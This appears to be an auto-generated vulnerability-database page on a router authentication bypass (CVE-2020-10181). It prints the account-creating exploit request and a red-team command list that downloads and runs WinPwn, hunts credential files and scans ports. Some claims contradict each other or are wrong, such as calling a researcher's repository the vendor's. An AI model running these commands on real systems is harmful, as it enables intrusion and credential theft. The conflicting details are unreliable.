CVE-2020-10181
Overview
This vulnerability is an authentication bypass allowing unauthorized creation of privileged user accounts via a web interface. The root cause is insufficient validation and authorization checks in the goform/formEMR30 endpoint of the Sumavision Enhanced Multimedia Router firmware version 3.0.4.27. The affected component is the router's web management interface handling user account creation requests.
Vulnerability Description
goform/formEMR30 in Sumavision Enhanced Multimedia Router (EMR) 3.0.4.27 allows creation of arbitrary users with elevated privileges (administrator) on a device, as demonstrated by a setString=new_user<*1*>administrator<*1*>123456 request.
Impact
An unauthenticated attacker can remotely create administrator-level accounts on the affected router, gaining full control over device configuration and management. This allows complete compromise of the device, including potential network access escalation and interception of traffic. No prior authentication or user interaction is required, increasing the likelihood of exploitation in exposed environments. The compromise can lead to persistent unauthorized access and disruption of network operations.
Solution
Users should upgrade Sumavision Enhanced Multimedia Router firmware to a version later than 3.0.4.27 where this issue is resolved. Refer to the vendor's official GitHub repository (https://github.com/s1kr10s/Sumavision_EMR3.0) and Packet Storm advisory (http://packetstormsecurity.com/files/156746) for detailed patch information and mitigation guidance. Implementing web interface access restrictions and disabling remote management until patched is recommended as a temporary workaround.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Enhanced Multimedia Router firmware version 3.0.4.27 allows for the unauthorized creation of users with elevated privileges, specifically administrator accounts. This flaw arises from improper validation of input parameters in the goform/formEMR30 endpoint, which can be exploited through crafted HTTP requests. By manipulating the parameters, an attacker can issue commands that create new user accounts with administrative rights, effectively bypassing any authentication mechanisms in place. The lack of adequate input sanitization and access control measures is a critical oversight, exposing the device to significant security risks.
Exploitation of this vulnerability can occur through various attack vectors, primarily targeting networked environments where the router is deployed. An attacker could leverage social engineering techniques to gain access to the local network or exploit weaknesses in the network perimeter to send crafted requests directly to the router. Once an attacker successfully creates an administrator account, they can gain full control over the device, allowing them to alter configurations, intercept network traffic, and potentially pivot to other devices within the network. This scenario highlights the ease with which an attacker can escalate privileges and compromise the integrity of the entire network.
The real-world impact of this vulnerability is profound, particularly for organizations relying on the Enhanced Multimedia Router for critical operations. An attacker with administrative access could manipulate network settings, leading to service disruptions, data breaches, or unauthorized access to sensitive information. The business risks associated with such an incident include financial losses, reputational damage, and potential regulatory penalties, especially if customer data is compromised. The high CVSS score of 9.8 underscores the severity of the threat, indicating that organizations must prioritize remediation efforts to mitigate potential exploitation.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating firmware to the latest version is essential, as vendors typically release patches to address known vulnerabilities. Network segmentation can also reduce the risk of unauthorized access by limiting the exposure of critical devices to untrusted networks. Additionally, organizations should employ intrusion detection systems (IDS) to monitor for unusual traffic patterns indicative of exploitation attempts. Regular security audits and penetration testing can further help identify weaknesses in the network and ensure that security controls are functioning as intended.
In conclusion, the vulnerability in the Enhanced Multimedia Router firmware presents a significant threat to network security, allowing for the creation of unauthorized administrator accounts. The potential for exploitation through various attack vectors poses serious risks to organizational integrity and data security. By adopting proactive detection and mitigation strategies, organizations can safeguard their networks against this and similar vulnerabilities, ensuring a robust security posture in an increasingly complex threat landscape.
CVE-2020-10181 has recently been incorporated into the CISA Known Exploited Vulnerabilities (KEV) catalog, reflecting a formal recognition of its criticality in the federal cybersecurity landscape. This inclusion, coupled with the assignment of a high CVSS score of 9.8, underscores a reassessment of the vulnerability’s impact and exploitability. Concurrently, the Exploit Prediction Scoring System (EPSS) has registered a significant increase, now indicating a moderate likelihood of exploitation in the wild. While no new exploit techniques or active campaigns have been identified by our telemetry, the elevation in EPSS score signals growing attacker interest or potential for opportunistic exploitation. For defenders, this shift mandates heightened vigilance, as the vulnerability’s ability to facilitate unauthorized creation of administrator accounts poses a severe risk to network integrity and access control. The updated risk profile elevates the threat level from theoretical to imminent, emphasizing that organizations should closely monitor related indicators and prioritize detection capabilities accordingly.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sumavision | Enhanced Multimedia Router Firmware | 3.0.4.27 |
cpe:2.3:o:sumavision:enhanced_multimedia_router_firmware:3.0.4.27:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-10181 |
| youtube.com |
GitHub CVE
x_refsource_MISC
|
https://www.youtube.com/watch?v=Ufcj4D9eA5o |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/s1kr10s/Sumavision_EMR3.0 |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/156746/Enhanced-Multimedia-Router-3.0.4.27-Cross-Site-Request-Forgery.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-10181 |